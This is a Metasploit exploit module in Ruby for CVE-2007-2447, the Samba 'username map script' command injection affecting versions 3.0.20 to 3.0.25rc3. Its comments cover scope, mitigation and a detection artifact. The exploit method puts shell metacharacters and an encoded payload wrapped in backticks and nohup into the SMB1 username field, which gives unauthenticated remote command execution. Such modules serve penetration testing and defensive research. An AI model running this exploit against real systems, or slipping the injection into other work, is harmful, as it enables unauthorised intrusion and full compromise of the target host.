##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
6
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SMB::Client

  # Declared for the customized session_setup_no_ntlmssp path used in #exploit
  # (neither constant is referenced directly in the code visible in this file).
  CONST = Rex::Proto::SMB::Constants
  CRYPT = Rex::Proto::SMB::Crypt

  # Module metadata for CVE-2007-2447. Scope, per the Description below:
  # Samba 3.0.20 through 3.0.25rc3, and only when the non-default
  # "username map script" option is configured. The mapping runs before
  # authentication, so no credentials are involved. Mitigation is the vendor
  # fix in the referenced samba.org advisory, or not using that option.
  #
  # @param info [Hash] module info merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Samba "username map script" Command Execution',
        'Description' => %q{
          This module exploits a command execution vulnerability in Samba
          versions 3.0.20 through 3.0.25rc3 when using the non-default
          "username map script" configuration option. By specifying a username
          containing shell meta characters, attackers can execute arbitrary
          commands.

          No authentication is needed to exploit this vulnerability since
          this option is used to map usernames prior to authentication!
        },
        'Author' => [ 'jduck' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2007-2447' ],
          [ 'OSVDB', '34700' ],
          [ 'BID', '23972' ],
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],
          [ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]
        ],
        'Platform' => ['unix'],
        'Arch' => ARCH_CMD,
        'Privileged' => true, # root or nobody user
        'Payload' => {
          'Space' => 1024,
          'DisableNops' => true,
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              # *_perl and *_ruby work if they are installed
              # mileage may vary from system to system..
            }
        },
        'Targets' => [
          [ "Automatic", {} ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2007-05-14',
        # No check method is defined in this file; reliability, stability and
        # side effects are left as UNKNOWN rather than asserted.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # Defaults to the NetBIOS session service port used for SMB1.
    register_options(
      [
        Opt::RPORT(139)
      ]
    )

    # #exploit hard-codes connect(versions: [1]), so offering a protocol
    # version choice would be misleading; the option is removed.
    deregister_options('SMB::ProtocolVersion')
  end

  # Negotiates an SMB1 session, sends one session setup whose username is the
  # injection vector described in the module Description, then hands off to
  # the payload handler. The SMB reply itself is not used to judge success.
  #
  # Detection note: the observable artifact is an SMB1 session setup on RPORT
  # whose username contains shell metacharacters (backticks, "/=").
  def exploit
    vprint_status('Use Rex client (SMB1 only) since this module is not compatible with RubySMB client')
    # Only SMB1 is offered; the RubySMB client is not used by this module.
    connect(versions: [1])

    # The username is the injection point: it carries the shell metacharacters
    # the Description refers to, with the encoded command payload embedded
    # inside backticks under nohup.
    username = "/=`nohup " + payload.encoded + "`"
    begin
      simple.client.negotiate(false)
      # Random password plus the configured SMBDomain; per the Description the
      # username mapping happens before authentication, so the password value
      # does not decide the outcome.
      simple.client.session_setup_no_ntlmssp(username, rand_text(16), datastore['SMBDomain'], false)
    rescue ::Timeout::Error, XCEPT::LoginError
      # A timeout or login failure is expected whether or not the command ran;
      # the result is observed through the handler below, not here.
    end

    handler
  end
end